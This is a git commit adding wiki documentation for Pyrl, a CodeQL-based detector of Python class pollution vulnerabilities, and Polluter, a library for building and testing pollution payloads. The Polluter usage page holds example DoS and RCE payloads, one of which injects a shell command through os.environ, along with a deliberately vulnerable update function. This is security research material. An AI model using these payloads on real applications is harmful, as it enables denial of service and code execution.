docs(wiki): Provides documentation for Pyrl and Polluter

jackfromeast · jackfromeast · commit 02b2c5326754 · 2026-05-13T00:17:25.000-04:00
diff --git a/website/source/content/docs/tool/_index.md b/website/source/content/docs/tool/_index.md
@@ -0,0 +1,21 @@
+---
+title: "Tool"
+weight: 5
+bookCollapseSection: true
+---
+
+# Detection and Exploitation Tools
+
+This project provides two tools for working with Python class pollution vulnerabilities:
+
+## Pyrl — Detection
+
+**Pyrl** is the first automated tool for detecting class pollution vulnerabilities in real-world Python applications. It uses a novel static analysis technique called *operational taint analysis* to precisely model the "get" and "set" primitives unique to class pollution.
+
+[Learn more about Pyrl →]({{< relref "pyrl" >}})
+
+## Polluter — Exploitation & Testing
+
+**Polluter** is a Python library for testing and exploiting class pollution gadget chains. It helps security researchers and developers verify whether a class pollution vulnerability is exploitable in a specific application context.
+
+[Learn more about Polluter →]({{< relref "polluter" >}})
diff --git a/website/source/content/docs/tool/polluter/_index.md b/website/source/content/docs/tool/polluter/_index.md
@@ -0,0 +1,20 @@
+---
+title: "Polluter"
+weight: 2
+bookCollapseSection: true
+---
+
+# Polluter
+
+**Polluter** is a Python library for testing and exploiting class pollution gadget chains. It provides utilities for constructing pollution payloads, verifying exploitability, and testing gadgets against vulnerable applications.
+
+## What Polluter Does
+
+- Constructs nested dictionary payloads for class pollution attacks
+- Tests gadget chains against running applications
+- Provides a library of known gadgets for common frameworks
+- Helps security researchers verify Pyrl findings
+
+## Source Code
+
+The Polluter library is located at [`lib/polluter/`](https://github.com/jackfromeast/python-class-pollution/tree/main/lib/polluter) in the repository.
diff --git a/website/source/content/docs/tool/polluter/install.md b/website/source/content/docs/tool/polluter/install.md
@@ -0,0 +1,19 @@
+---
+title: "Installation"
+weight: 1
+---
+
+# Installing Polluter
+
+## From Source
+
+```bash
+git clone https://github.com/jackfromeast/python-class-pollution.git
+cd python-class-pollution/lib/polluter
+pip install -e .
+```
+
+## Requirements
+
+- Python 3.10+
+- No additional dependencies for the core library
diff --git a/website/source/content/docs/tool/polluter/usage.md b/website/source/content/docs/tool/polluter/usage.md
@@ -0,0 +1,78 @@
+---
+title: "Usage"
+weight: 2
+---
+
+# Using Polluter
+
+Polluter helps construct and test class pollution payloads.
+
+## Constructing Payloads
+
+```python
+from polluter import Payload
+
+# Build a DoS payload targeting __getattribute__
+payload = Payload.build(
+    path="__class__.__getattribute__",
+    value="1337"
+)
+# → {"__class__": {"__getattribute__": "1337"}}
+
+# Build an RCE payload targeting os.environ
+payload = Payload.build(
+    path="__class__.__init__.__globals__.sys.modules.os.environ.BROWSER",
+    value="/bin/sh -c 'id > /tmp/pwned'"
+)
+```
+
+## Testing Against a Vulnerable Function
+
+```python
+from polluter import test_pollution
+
+# Define the vulnerable update function
+def update(obj, data):
+    for key in data:
+        val = data[key]
+        if isinstance(val, dict):
+            update(getattr(obj, key), val)
+        else:
+            setattr(obj, key, val)
+
+# Test if pollution is achievable
+result = test_pollution(
+    target_func=update,
+    payload_path="__class__.__getattribute__",
+    payload_value="1337"
+)
+
+print(result.success)      # True/False
+print(result.consequence)  # "DoS" / "RCE" / etc.
+```
+
+## Using with the PoC Collection
+
+Each entry in the `cp-collection/` directory contains a proof-of-concept that can be run with Polluter:
+
+```bash
+cd cp-collection/django-unicorn/poc
+pip install -r requirements.txt
+python poc.py
+```
+
+## Gadget Library
+
+Polluter includes known gadget templates:
+
+```python
+from polluter.gadgets import dos, rce, xss, auth_bypass
+
+# Get all DoS gadgets
+for gadget in dos.all():
+    print(f"{gadget.name}: {gadget.path} = {gadget.value}")
+
+# Get RCE gadgets that work with Constrained-Get
+for gadget in rce.constrained():
+    print(f"{gadget.name}: {gadget.path}")
+```
diff --git a/website/source/content/docs/tool/pyrl/_index.md b/website/source/content/docs/tool/pyrl/_index.md
@@ -0,0 +1,73 @@
+---
+title: "Pyrl"
+weight: 1
+bookCollapseSection: true
+---
+
+# Pyrl
+
+Pyrl (pronounced "Pearl") is the **first automated detection tool** for Python class pollution vulnerabilities. It uses a novel static analysis technique called *operational taint analysis* implemented on top of CodeQL.
+
+## What Pyrl Does
+
+Pyrl tracks attacker-controlled inputs through "get" and "set" primitives using fine-grained semantic taint labels that capture:
+- **T_INPUT** — Direct attacker input
+- **T_ENUM** — Enumerable value from split operations
+- **T_KEY** — Potential key value from enumeration
+- **T_OBJ** — Object resolved through a tainted key
+- **G_ATTR** / **G_ITEM** — Access type annotations (attribute vs. item)
+
+## Key Features
+
+- Detects all **6 vulnerability types** in the taxonomy
+- Handles both first-order and second-order get operations
+- Performs **exploitability checking** (verifies both assignments in Dual-Set are in mutually exclusive branches)
+- Uses **barrier node analysis** to reduce false positives (key sanitization, type checks)
+- Scales to large codebases (linear with AST nodes)
+
+## Performance
+
+- **868** total alerts across 671K+ Python projects
+- **47** confirmed true positive zero-day vulnerabilities
+- **38%** false positive rate (significantly lower than 78-97% for baseline approaches)
+- Analysis time: typically under 2 minutes per package
+
+## Architecture
+
+```
+┌──────────────────────────────────────────────────┐
+│                    Pyrl Pipeline                  │
+├──────────────────────────────────────────────────┤
+│                                                  │
+│  1. Package Download & Database Setup            │
+│     └─ CodeQL database creation                  │
+│                                                  │
+│  2. Operational Taint Analysis                   │
+│     ├─ Taint Initialization (INPUT rule)         │
+│     ├─ Taint Propagation (SPLIT, ENUMERATE,      │
+│     │   GETITEM, GETATTR, BRANCH rules)          │
+│     └─ Taint Merging (at control-flow joins)     │
+│                                                  │
+│  3. Vulnerability Detection                      │
+│     ├─ Sink identification (assignment tuples)   │
+│     ├─ Label condition checking (Table 5)        │
+│     └─ Type classification (6 types)            │
+│                                                  │
+│  4. Exploitability Checking                      │
+│     ├─ Mutual exclusion verification             │
+│     └─ Barrier node / dominator analysis         │
+│                                                  │
+│  5. Result Processing                            │
+│     └─ Report generation with taint flow paths   │
+│                                                  │
+└──────────────────────────────────────────────────┘
+```
+
+## Implementation
+
+- Written in **CodeQL** (QL language) — 3,509 lines of new code
+- Runs on CodeQL v2.21.3 with Python language support v4.0.5
+- Extended CodeQL standard library for:
+  - Collection data structures (`namedtuple`, `reduce`, etc.)
+  - Object attribute definition resolution
+  - Data flow through higher-order functions
diff --git a/website/source/content/docs/tool/pyrl/install.md b/website/source/content/docs/tool/pyrl/install.md
@@ -0,0 +1,83 @@
+---
+title: "Installation"
+weight: 1
+---
+
+# Installing Pyrl
+
+## Prerequisites
+
+- Python 3.10+
+- [CodeQL CLI](https://github.com/github/codeql-cli-binaries) v2.21.3 or later
+- Git
+
+## Installation Steps
+
+### 1. Clone the Repository
+
+```bash
+git clone https://github.com/jackfromeast/python-class-pollution.git
+cd python-class-pollution
+```
+
+### 2. Install Python Dependencies
+
+```bash
+# Using uv (recommended)
+uv sync
+
+# Or using pip
+pip install -e .
+```
+
+### 3. Install CodeQL CLI
+
+Download the CodeQL CLI from the [official releases](https://github.com/github/codeql-cli-binaries/releases):
+
+```bash
+# Linux/macOS
+wget https://github.com/github/codeql-cli-binaries/releases/download/v2.21.3/codeql-linux64.zip
+unzip codeql-linux64.zip
+export PATH="$PWD/codeql:$PATH"
+
+# Verify installation
+codeql version
+```
+
+### 4. Download CodeQL Libraries
+
+```bash
+# Clone the CodeQL standard libraries
+git clone https://github.com/github/codeql.git codeql-repo
+```
+
+### 5. Verify Installation
+
+```bash
+# Check Pyrl is accessible
+python -m pyrl --help
+```
+
+## Docker (Alternative)
+
+If you prefer containerized setup:
+
+```bash
+docker build -t pyrl .
+docker run -v $(pwd)/target:/target pyrl analyze /target
+```
+
+## Troubleshooting
+
+### CodeQL version mismatch
+Pyrl requires CodeQL v2.21.3+ with Python language support v4.0.5. Check with:
+```bash
+codeql version
+codeql resolve languages  # Should show python
+```
+
+### Python version
+Pyrl requires Python 3.10+:
+```bash
+python --version  # Must be >= 3.10
+```
diff --git a/website/source/content/docs/tool/pyrl/usage.md b/website/source/content/docs/tool/pyrl/usage.md